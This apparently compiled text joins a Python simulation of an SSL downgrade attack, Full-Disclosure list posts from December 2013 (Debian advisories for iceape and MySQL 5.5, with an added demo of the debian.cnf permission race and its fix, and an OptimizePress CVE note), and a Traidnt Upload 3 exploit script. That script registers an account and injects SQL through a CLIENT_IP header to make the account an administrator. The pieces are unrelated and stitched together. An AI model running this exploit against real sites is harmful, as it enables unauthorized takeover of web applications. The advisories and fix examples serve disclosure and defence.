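    raise DowngradeError("cluster manager offered %r, refusing cleartext" % cm_reply)


def mitm_rewrite(cm_reply):
    """The attacker in the path swaps the SSL reply for the legacy one so the
    client never starts the SSL handshake."""
    return CLIENT_HELLO if cm_reply == CM_SSL_REPLY else cm_reply


def classify_first_record(data):
    """Passive check on the bytes after the 8-byte handshake: an SSL record
    starts with 16 03; anything else is protocol data in the clear."""
    return "ssl" if data[:2] == b"\x16\x03" else "cleartext"


def printable_runs(payload, minlen=4):
    """Printable ASCII runs in a cleartext packet; on the captured login
    packet these are the user name and the obfuscated password."""
    pattern = rb"[\x20-\x7e]{%d,}" % minlen
    return [m.group().decode("ascii") for m in re.finditer(pattern, payload)]


def simulate_downgrade():
    """Whole exchange with the attacker in the path, from the vulnerable
    client's point of view: its decision, what an observer then sees on the
    wire, and what the observer can read out of it."""
    observed_reply = mitm_rewrite(CM_SSL_REPLY)
    mode = negotiate(observed_reply, allow_downgrade=True)
    return (mode,
            classify_first_record(CLEARTEXT_LOGIN_PACKET),
            printable_runs(CLEARTEXT_LOGIN_PACKET))


if __name__ == "__main__":
    print(simulate_downgrade())
    try:
        negotiate(mitm_rewrite(CM_SSL_REPLY))
    except DowngradeError as err:
        print("hardened client:", err)
```

The same classifier doubles as a network-side detection rule: a port 5500 session whose client bytes after the handshake do not start with an SSL record is either an old client or a downgrade in progress, and either way worth an alert.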

Re: [Full-disclosure] Kaspersky Internet Security - fake av.

2013-12-16 Thread iPwn
Em 15-12-2013 21:48, vx Indy escreveu:
> Hello.
>
> Here is the description(ru).
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
hi indy,im iPwn =))
nice work..

[Full-disclosure] [SECURITY] [DSA 2819-1] End-of-life announcement for iceape

2013-12-16 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2819-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
December 16, 2013  http://www.debian.org/security/faq
- -

Package: iceape

Security support for Iceape, the Debian-branded version of the Seamonkey
suite needed to be stopped before the end of the regular security
maintenance life cycle.

We recommend to migrate to Iceweasel for the web browser functionality
and to Icedove for the e-mail bits. Iceweasel and Icedove are based
on the same codebase and will continue to be supported with security
updates. Alternatively you can switch to the binaries provided by
Mozilla available at http://www.seamonkey-project.org/releases/

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iEYEARECAAYFAlKvJBMACgkQXm3vHE4uyloALgCfU5PPVJ7Ajg4g1MestH4cEcxl
+0cAn3cqG8HvyUNp4ACD9/96gZG5HigR
=AbYs
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2818-1] mysql-5.5 security update

2013-12-16 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2818-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
December 16, 2013  http://www.debian.org/security/faq
- -

Package: mysql-5.5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-1861 CVE-2013-2162 CVE-2013-3783 CVE-2013-3793 
 CVE-2013-3802 CVE-2013-3804 CVE-2013-3809 CVE-2013-3812
 CVE-2013-3839 CVE-2013-5807
Debian Bug : 711600 732306

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream
version, 5.5.33, which includes additional changes, such as performance
improvements, bug fixes, new features, and possibly incompatible
changes. Please see the MySQL 5.5 Release Notes for further details:

 http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-32.html
 http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-33.html

In addition this update fixes two issues affecting specifically the
mysql-5.5 Debian package:

A race condition in the post-installation script of the mysql-server-5.5
package creates the configuration file "/etc/mysql/debian.cnf" with
world-readable permissions before restricting the permissions, which
allows local users to read the file and obtain sensitive information
such as the credentials for the debian-sys-maint user used to perform
administration tasks. (CVE-2013-2162)

Matthias Reichl reported that the mysql-5.5 package misses the patches
applied previously in Debian's mysql-5.1 to drop the database "test" and
the permissions that allow anonymous access, without a password, from
localhost to the "test" database and any databases starting with
"test_". This update reintroduces these patches for the mysql-5.5
package.

Existing databases and permissions are not touched. Please refer to the
NEWS file provided with this update for further information.

For the stable distribution (wheezy), these problems have been fixed in
version 5.5.33+dfsg-0+wheezy1.

For the unstable distribution (sid), the Debian specific problems will
be fixed soon.

We recommend that you upgrade your mysql-5.5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)
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=5UEA
-END PGP SIGNATURE-

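The window behind CVE-2013-2162, shown in an added Python example that is mine and not the Debian postinst script: the racy pattern (create with the process umask, write, then chmod) beside the fix (create the file already restricted with O_CREAT|O_EXCL and mode 0600). The umask of 022 is set explicitly and restored so the two are comparable; the file content is a constructed stand-in, not a real debian.cnf.

```python
import os
import stat
import tempfile

SAMPLE_CNF = "[client]\nuser = debian-sys-maint\npassword = example-not-real\n"


def racy_create(path, content, umask=0o022):
    """The vulnerable sequence: open() honours the umask, so the file is
    0644 from the moment it exists until the chmod. Returns the mode a
    concurrent reader would see inside that window."""
    old = os.umask(umask)
    try:
        with open(path, "w") as f:
            f.write(content)
        exposed = stat.S_IMODE(os.stat(path).st_mode)   # world-readable here
        os.chmod(path, 0o600)                           # too late
    finally:
        os.umask(old)
    return exposed


def safe_create(path, content, umask=0o022):
    """The fix: ask the kernel for 0600 at creation (mode & ~umask is still
    0600), and O_EXCL so a pre-planted file or symlink is refused rather than
    silently reused. Returns the mode as created."""
    old = os.umask(umask)
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w") as f:
            f.write(content)
        return stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.umask(old)


def demo():
    """Run both variants in a scratch directory; returns (racy, safe) modes."""
    workdir = tempfile.mkdtemp()
    racy = racy_create(os.path.join(workdir, "debian.cnf"), SAMPLE_CNF)
    safe = safe_create(os.path.join(workdir, "debian.cnf.fixed"), SAMPLE_CNF)
    return racy, safe


if __name__ == "__main__":
    racy, safe = demo()
    print("racy create exposed mode %o, safe create mode %o" % (racy, safe))
```

For a shell postinst the equivalent is to run the redirection under a restrictive umask, e.g. inside `( umask 077; ... > /etc/mysql/debian.cnf )`, instead of relying on a later chmod.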


[Full-disclosure] Arabportal 2.x , Sql injection / Password reset exploit

2013-12-16 Thread 0u7 5m4r7
Nice SQL injection and Password reset Exploitation
First released @ the deep side of sec4ever.com more than a year ago
<>

[Full-disclosure] Traidnt up 3 , Admin info reset exploit

2013-12-16 Thread 0u7 5m4r7
Traidnt upload version 3
doesn't filter the x_forwarded_for header, which allows the attacker to exploit
it to update the administrator's data
#!/usr/bin/python
# Python 2 (urllib2 / raw_input). Exploit as posted; comments and the
# missing cookie check were added, the requests are unchanged.
import urllib2
import sys
print """
+---+
|   Traidnt upload 3 - Admin add Exploit|
|  By i-Hmx |
|sec4ever.com   |
| n0p1...@gmail.com |
+---+"""
target=str(raw_input("[*] Enter Target  # "))
print "[+] Adding new user"
try:
	# register an ordinary account that will be escalated below
	register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1...@gmail.com&password=sec4ever&rules=faris rules")
except:
	print "[-] Exception happened :("
	sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
cookies=None
for header in login.headers.items():
	if header[0].lower()=="set-cookie":
		cookies=header[1]
# no session cookie at all, or not the one the panel expects: bail out
if cookies is None or cookies.find("upload_sid")==-1:
	print "[-] Exploitation Failed"
	sys.exit()
print "[+] Upgrading privileges"
# the unfiltered client-address header value is spliced into the query that
# updates the logged-in user's record, so the closing quote and `group`='1'
# rewrite the group column of our own account
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n+ User : farsawy\n+ pass : sec4ever\n+ Probably you are an admin now ;)"
sys.exit()

Re: [Full-disclosure] WordPress OptimizePress Theme - File Upload Vulnerability

2013-12-16 Thread Kurt Seifried
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 12/14/2013 09:04 AM, cve-ass...@mitre.org wrote:
>> http://blog.sucuri.net/2013/12/wordpress-optimizepress-theme-file-upload-vulnerability.html
>
>>  
>> http://help.optimizepress.com/customer/portal/articles/1381790-important-optimizepress-1-0-security-update
>
>>  Important OptimizePress 1.0 Security Update This is an important
>> announcement for OptimizePress 1.0 users. (Please note this does
>> NOT apply to OptimizePress 2.0 which is built with a completely
>> new codebase)
> 
>> The target of the attack is the following file: 
>> lib/admin/media-upload.php. It can be used to upload any file to
>> the wp-content/uploads/optpress/images_comingsoon directory. It
>> doesn't even change the extension.
> 
>> Look for the following files: lib/admin/media-upload.php, 
>> lib/admin/media-upload-lncthumb.php, 
>> lib/admin/media-upload-sq_button.php
> 
>> Patch:
> 
>> if ( !current_user_can('add_users') ) { echo 'You cannot access
>> this file. Sorry.'; exit; }
> 
> Use CVE-2013-7102.

FYI this issue has been assigned a CVE.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)
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=r0IP
-END PGP SIGNATURE-
